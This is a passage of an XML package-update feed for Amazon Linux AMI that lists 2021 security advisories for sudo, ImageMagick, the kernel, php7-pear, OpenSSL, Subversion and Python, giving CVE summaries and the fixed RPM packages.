version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.214-118.339.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1478</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1478: important priority package update for sudo</title><issued date="2021-01-26 00:11:00" /><updated date="2021-01-26 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3156:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156" title="" id="CVE-2021-3156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-9.56.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-9.56.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-9.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1479</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1479: important priority package update for ImageMagick</title><issued date="2021-02-16 00:13:00" /><updated date="2021-02-16 22:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29599:
A flaw was found in ImageMagick. The -authenticate option is mishandled allowing user-controlled password set for a PDF file to possibly inject additional shell commands via coders/pdf.c. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1907456: CVE-2020-29599 ImageMagick: Shell injection via PDF password could result in arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29599" title="" id="CVE-2020-29599" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1480</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1480: important priority package update for kernel</title><issued date="2021-02-16 00:13:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1390:
A remote denial of service vulnerability was found in the Linux kernel's TIPC kernel module. The while loop in tipc_link_xmit() hits an unknown state while attempting to parse SKBs, which are not in the queue. Sending two small UDP packets to a system with a UDP bearer results in the CPU utilization for the system to instantly spike to 100%, causing a denial of service condition.
CVE-2021-39648:
In gadget_dev_desc_UDC_show of configfs.c, there is a possible disclosure of kernel heap memory due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-160822094References: Upstream kernel
CVE-2021-3348:
A use after free flaw in the Linux kernel network block device (NBD) subsystem was found in the way user calls an ioctl NBD_SET_SOCK at a certain point during device setup.
CVE-2021-3347:
A flaw was found in the Linux kernel. A use-after-free memory flaw in the Fast Userspace Mutexes functionality allowing a local user to crash the system or escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3178:
A flaw leak of the file handle for parent directory in the Linux kernel's NFS3 functionality was found in the way user calls READDIRPLUS. A local user could use this flaw to traverse to other parts of the file-system than mounted sub-folder.
CVE-2020-28374:
A flaw was found in the Linux kernel's implementation of the Linux SCSI target host, where an authenticated attacker could write to any block on the exported SCSI device backing store. This flaw allows an authenticated attacker to send LIO block requests to the Linux system to overwrite data on the backing store. The highest threat from this vulnerability is to integrity. In addition, this flaw affects the tcmu-runner package, where the affected SCSI command is called.
CVE-2020-27825:
A use-after-free flaw was found in kernel/trace/ring_buffer.c in Linux kernel. There was a race problem in trace_open and resize of cpu buffer running parallely on different cpus, may cause a denial of service problem (DOS). This flaw could even allow a local attacker with special user privilege to a kernel information leak threat.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27825" title="" id="CVE-2020-27825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28374" title="" id="CVE-2020-28374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3178" title="" id="CVE-2021-3178" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3347" title="" id="CVE-2021-3347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3348" title="" id="CVE-2021-3348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39648" title="" id="CVE-2021-39648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1390" title="" id="CVE-2023-1390" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1481</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1481: medium priority package update for php7-pear</title><issued date="2021-02-16 00:13:00" /><updated date="2021-02-16 22:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-36193:
Tar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links.
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36193" title="" id="CVE-2020-36193" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php7-pear" version="1.10.12" release="5.32.amzn1" epoch="1" arch="noarch"><filename>Packages/php7-pear-1.10.12-5.32.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1482</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1482: medium priority package update for openssl</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23841:
The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources.
1930310: CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()
CVE-2021-23840:
Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.
Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
1930324: CVE-2021-23840 openssl: integer overflow in CipherUpdate
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840" title="" id="CVE-2021-23840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841" title="" id="CVE-2021-23841" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.153.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1483</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1483: important priority package update for subversion</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-17525:
A null-pointer-dereference flaw was found in mod_authz_svn of subversion. This flaw allows a remote, unauthenticated attacker to cause a denial of service in some server configurations. The highest threat from this vulnerability is to system availability.
1922303: CVE-2020-17525 subversion: Remote unauthenticated denial of service in mod_authz_svn
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17525" title="" id="CVE-2020-17525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.7-1.61.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.7-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1484</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1484: medium priority package update for python27 python36 python38</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3177:
A flaw was found in python. A stack-based buffer overflow was discovered in the ctypes module provided within Python. Applications that use ctypes without carefully validating the input passed to it may be vulnerable to this flaw, which would allow an attacker to overflow a buffer on the stack and crash the application. The highest threat from this vulnerability is to system availability.
1918168: CVE-2021-3177 python: stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3177" title="" id="CVE-2021-3177" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-test" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.5.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.5.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.141.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.141.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.141.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.20.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.20.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 